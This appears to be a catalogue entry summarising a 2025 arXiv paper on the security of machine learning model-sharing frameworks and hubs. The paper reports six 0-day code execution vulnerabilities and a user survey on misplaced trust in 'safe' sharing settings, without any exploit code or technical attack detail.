benchmark 2025

When Secure Isn't: Assessing the Security of Machine Learning Model Sharing

Gabriele Digregorio , Marco Di Gennaro , Stefano Zanero , Stefano Longari , Michele Carminati

0 citations

α

Published on arXiv

2509.06703

AI Supply Chain Attacks

OWASP ML Top 10 — ML06

Key Finding

Six 0-day arbitrary code execution vulnerabilities were found in ML frameworks claiming secure model-sharing support, demonstrating that neither security-oriented settings nor file format alone can guarantee safety in the ML supply chain.


The rise of model-sharing through frameworks and dedicated hubs makes Machine Learning significantly more accessible. Despite their benefits, these tools expose users to underexplored security risks, while security awareness remains limited among both practitioners and developers. To enable a more security-conscious culture in Machine Learning model sharing, in this paper we evaluate the security posture of frameworks and hubs, assess whether security-oriented mechanisms offer real protection, and survey how users perceive the security narratives surrounding model sharing. Our evaluation shows that most frameworks and hubs address security risks partially at best, often by shifting responsibility to the user. More concerningly, our analysis of frameworks advertising security-oriented settings and complete model sharing uncovered six 0-day vulnerabilities enabling arbitrary code execution. Through this analysis, we debunk the misconceptions that the model-sharing problem is largely solved and that its security can be guaranteed by the file format used for sharing. As expected, our survey shows that the surrounding security narrative leads users to consider security-oriented settings as trustworthy, despite the weaknesses shown in this work. From this, we derive takeaways and suggestions to strengthen the security of model-sharing ecosystems.


Key Contributions

  • Systematic security evaluation of major ML model-sharing frameworks and hubs, showing most address risks only partially and shift responsibility to users
  • Discovery of six 0-day vulnerabilities enabling arbitrary code execution in frameworks advertising security-oriented or 'safe' model-sharing settings
  • User survey revealing that security narratives around model sharing cause practitioners to over-trust security-oriented settings despite demonstrated weaknesses

🛡️ Threat Analysis

AI Supply Chain Attacks

The paper's primary focus is the security of ML model-sharing infrastructure — frameworks (e.g., those handling serialization/deserialization), model hubs, and security-oriented sharing settings. Discovering 0-day vulnerabilities enabling arbitrary code execution when users load shared models is a canonical AI supply chain attack: malicious or vulnerable models distributed via public repositories and frameworks can compromise user systems at load time.


Details

Threat Tags
black_boxdigitalinference_time
Applications
ml model sharingmodel hubsml frameworksmodel deserialization